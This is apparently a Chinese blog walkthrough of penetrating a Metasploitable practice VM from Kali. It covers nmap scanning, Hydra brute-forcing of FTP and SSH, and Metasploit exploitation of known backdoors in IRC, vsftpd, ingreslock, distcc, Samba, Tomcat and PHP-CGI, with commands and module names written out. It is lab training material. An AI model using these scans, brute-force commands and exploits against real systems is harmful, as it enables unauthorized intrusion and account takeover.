kali渗透metasploitable靶机

扫描阶段:

工具:Nmap

隐蔽扫描      nmap  -sS 192.168.8.135

kali渗透metasploitable靶机_第1张图片

端口爆破:FTP、SSH等

工具:Hydra

备用字典

kali渗透metasploitable靶机_第2张图片

  • 爆破FTP

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135

kali渗透metasploitable靶机_第3张图片

  • 爆破SSH

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  192.168.8.135 ssh

kali渗透metasploitable靶机_第4张图片

登陆系统:

kali渗透metasploitable靶机_第5张图片

端口渗透:

  • 6667——-irc_3281_backdoor

利用metasploit

kali渗透metasploitable靶机_第6张图片

成功获取会话,root权限

kali渗透metasploitable靶机_第7张图片

  • 6200——-vsftpd_234_backdoor

利用metasploit

kali渗透metasploitable靶机_第8张图片

反弹会话,root权限

kali渗透metasploitable靶机_第9张图片

  • 1524——-ingrelock_backdoor

利用telnet连接1524,直接返回root会话

kali渗透metasploitable靶机_第10张图片

  • 1099——-distcc程序漏洞—-ingrelock

利用metasploit

kali渗透metasploitable靶机_第11张图片

返回会话

kali渗透metasploitable靶机_第12张图片

  • 139——-samba为3.0漏洞

先用nmap进行详细扫描

nmap -v -A -T4 192.168.8.135

kali渗透metasploitable靶机_第13张图片

Samba 3.0.20

利用metasploit

kali渗透metasploitable靶机_第14张图片

kali渗透metasploitable靶机_第15张图片

返回会话,root权限

kali渗透metasploitable靶机_第16张图片

  • 8180——-Apache Tomcat弱口令
kali渗透metasploitable靶机_第17张图片

使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破

用默认自带的字典即可

kali渗透metasploitable靶机_第18张图片

爆破出tomcat/tomcat

使用use exploit/multi/http/tomcat_mgr_upload模块

获取meterpreter会话

kali渗透metasploitable靶机_第19张图片

  • 80——-PHP CGI参数注入执行漏洞
kali渗透metasploitable靶机_第20张图片

msf > search cve:2012-1823

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > show options

msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135

rhost => 192.168.8.135

msf exploit(php_cgi_arg_injection) > run

kali渗透metasploitable靶机_第21张图片

你可能感兴趣的:(渗透测试,linux学习,metasploit)